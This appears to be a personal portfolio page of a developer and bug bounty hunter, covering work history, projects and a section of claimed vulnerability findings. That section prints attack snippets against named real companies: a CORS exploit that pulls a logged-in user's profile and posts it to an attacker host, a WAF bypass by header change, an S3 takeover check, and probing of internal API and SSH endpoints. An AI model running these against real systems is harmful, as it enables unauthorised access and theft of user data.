Full-Stack Developer • Cybersecurity Expert • Part-Time Bug Bounty Hunter
I'm a passionate full-stack developer and cybersecurity enthusiast from West Bengal, India. With expertise in web development and ethical hacking, I create secure, efficient applications while hunting for vulnerabilities in my free time. Currently pursuing B.A. English at University of North Bengal while actively contributing to bug bounty platforms.
Let's Collaborate!
Hello! I'm Ratnadeep Bose from West Bengal, India - a dedicated full-stack developer with a passion for cybersecurity. My journey combines technical expertise in web development with the analytical mindset of a security researcher.
Academic Background: Currently pursuing B.A. English at University of North Bengal (2023-2027) with minors in History and Political Science. This interdisciplinary approach enhances my communication skills - crucial for explaining complex technical concepts to diverse audiences.
Full-Stack Development: I specialize in creating responsive, user-friendly web applications using modern technologies. My expertise spans frontend and backend development, database management, and deployment strategies.
Cybersecurity Journey: As a part-time bug bounty hunter, I actively hunt for vulnerabilities on platforms like HackerOne and Bugcrowd. My expertise includes reconnaissance, vulnerability assessment, and penetration testing using advanced tools and methodologies.
Technical Environment: I work in a multi-VM environment with Kali Linux and Windows 11, utilizing VMware for isolated testing. My workflow emphasizes both development productivity and security testing efficiency.
Professional Approach: I believe in creating secure-by-design applications, implementing best practices from the initial development phase through to deployment and maintenance.
Developing Flutter-based mobile apps for Azmth’s AI call management ecosystem.
Integrating AI voice features, analytics, and CRM sync modules for workflow automation.
Ensuring end-to-end security through encryption, code reviews, and secure authentication.
Collaborating across teams to enhance performance, reliability, and UX.
Impact: Improved app speed, data security, and AI system integration for a seamless user experience.
Skills: Flutter • Dart • RESTful APIs • Android Development • UI/UX Optimization
As the lead developer behind , a conscious luxury fashion brand, I designed and implemented the brand's full digital presence.
Built a responsive, high-performance e-commerce platform that showcases minimalist, inclusive fashion collections while ensuring seamless user experience across devices.
Integrated modern web technologies, optimized for speed, accessibility, and SEO, supporting brand storytelling and customer engagement.
Collaborated with design, branding, and marketing teams to translate it's premium aesthetic into a functional and scalable digital experience.
As a Web Developer Intern, I contributed to building and maintaining websites and applications using modern web technologies. I collaborated on REST API integrations, supported front-end development, and gained hands-on experience with server management and deployment.
Impact: I strengthened my skills in web development, software deployment, and problem-solving while working on real-world projects that support local businesses and organizations.
I am currently a full-time Teaching Faculty at Gurukul Jalpaiguri, where I design and deliver interactive lessons and simplified study materials to enhance student comprehension and engagement. I mentor students in exam preparation and writing skills, helping them achieve measurable academic improvement. Additionally, I cultivate a supportive and stimulating learning environment that fosters critical thinking, creativity, and independent problem-solving.
I taught students at Gurukul Jalpaiguri, preparing interactive lessons and simplified notes to enhance their comprehension and engagement. I mentored students in exam preparation and writing skills, improving their overall academic performance. At the same time, I fostered a supportive learning environment that encourages critical thinking and creativity.
Active full-stack developer and security researcher specializing in web application development and penetration testing. Conducted reconnaissance on major targets while building secure, responsive web applications. Expert in modern web technologies and security testing methodologies.
Providing personalized coaching in arts and humanities subjects with exceptional focus on academic excellence. Developed innovative teaching methodologies combining traditional subjects with technical knowledge. Successfully mentored students in comprehensive academic development.
Pursuing Bachelor of Arts in English with History and Political Science minors. This interdisciplinary approach enhances communication skills crucial for technical documentation and client interactions. Actively integrating academic learning with practical development and security research.
Click the certificate to view the full document.
Awarded 2nd Place for building a clean, structured, and design-focused frontend project during PixelHack — an intensive challenge emphasizing clarity, innovation, and technical execution.
Discoveries that enhanced enterprise security
Discovered critical CORS misconfiguration allowing cross-origin data theft from authenticated users on identity.porsche.com
fetch('https://identity.porsche.com/api/v2/users/me', {
method: 'GET',
credentials: 'include'
}).then(response => response.json())
.then(userData => {
// Exfiltrate sensitive user data
fetch('https://attacker-server.com/log', {
method: 'POST',
body: JSON.stringify(userData)
});
});
Identified and demonstrated critical subdomain takeover vulnerability allowing complete control over financial service infrastructure
# Verified unclaimed AWS S3 bucket
aws s3api head-bucket --bucket "public-preprod.us-west-2.remitly.com"
# Direct access to vulnerable resource
https://s3.us-west-2.amazonaws.com/public-preprod.us-west-2.remitly.com/
Successfully bypassed web application firewall protections to access internal configuration files and security keys
# Normal request (blocked by WAF)
curl -s "https://openapiportal.m-pesa.com/config.json"
# Returns: 403 Forbidden
# WAF Bypass technique
curl -s -H "Content-Type: text/plain" "https://openapiportal.m-pesa.com/config.json"
# Returns: 200 OK with sensitive data
Uncovered unauthenticated access to internal API endpoints exposing sensitive configuration data including reCAPTCHA keys
# Extract internal configuration
curl -s "https://api-catalog.rei.com/siteid"
curl -s "https://api-catalog.rei.com/portals/api/sites/rei-prod-apicatalog/liveportal/sitemap"Discovered permissive CORS policy exposing internal business data including vehicle configurations and pricing
curl -s "https://configurator.porsche.com/en-WW/model-start" \
-H "Origin: https://competitor.com" \
| grep -oP 'window\.__NEXT_DATA__ = \K\{.*\}(?=;)' \
| jq -r '.props.pageProps.initialState.modelSeries[]'Comprehensive security assessment revealing multiple attack vectors including SSH exposure, internal IP leaks, and email security gaps
# SSH Service Exposure
nmap -sV -p 22 sftp.remitly.io
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
Service fingerprint: SSH-2.0-AWS_SFTP_1.2Image OCR Tool extracts text directly from your pasted or uploaded images with precision. Supports up to 50 images at once and allows instant copying of all extracted text. Ideal for scanning notes, screenshots, and documents seamlessly in the browser.
Smart Task Dashboard is a personal productivity web app designed to organize notes, tasks, and ideas efficiently. It supports user authentication with email and password, providing a secure workspace to manage projects and goals. Built for clarity, speed, and focus.
Pacman Typing Test is a retro arcade-style typing game. I worked on this project as a developer — responsible for frontend features, animations, sound effects, and performance optimizations for a smooth and fun typing experience.
Aurevo is a fast-fashion ecommerce platform. I worked on Aurevo as a developer — responsible for frontend features, product listing flows, and performance optimizations for a smooth shopping experience.
Code OCR scans an uploaded folder (any file types allowed) and extracts source code files (JS, HTML, CSS, Python, etc.) into a consolidated, searchable view. Designed to help auditing, migration, and quick code review workflows.
Enterprise-grade web, API, and cloud vulnerability scanner with 50+ checks, multi-engine recon, API testing, continuous monitoring, and professional reporting for security teams and bug bounty hunters.
JavaScript Handbook: A concise guide covering core JavaScript concepts like variables, functions, objects, DOM, events, asynchronous code, and practical projects to build real-world skills.
Ratnadeep's own academy — quality, affordable classes in English, History, Politics, and Geography for grades 6 to 12.
TOOLKIT is a collection of 50 client-side tools for Text & Document, Links & Network, Security & Development, Study & Calculator, and Media & File. All tools work directly in the browser without needing a server.
This is a fun, browser-based Whack-A-Mole game built from scratch using HTML, CSS, and JavaScript. Players must quickly hit moles as they pop up from their holes, earning points for each successful hit.
DICTIONARY by Ratnadeep Bose is a sleek, web-based dictionary designed for speed, simplicity, and elegance. Instantly search any word and get clear, precise definitions with a responsive, user-friendly interface.
Developed by Ratnadeep Bose — “Constitution Explorer” is an interactive web platform that lets users browse, search, and study the Constitution of India with ease. Every Article, Schedule, and Amendment is presented through a sleek, accessible interface.
I'm open for exciting opportunities in web development, cybersecurity collaborations, and educational technology projects. Whether you need a full-stack application, security assessment, or custom software solution, let's connect!
Specializations: Full-stack development, bug bounty hunting, web application security, educational technology, and custom software solutions. Available for remote collaborations worldwide.
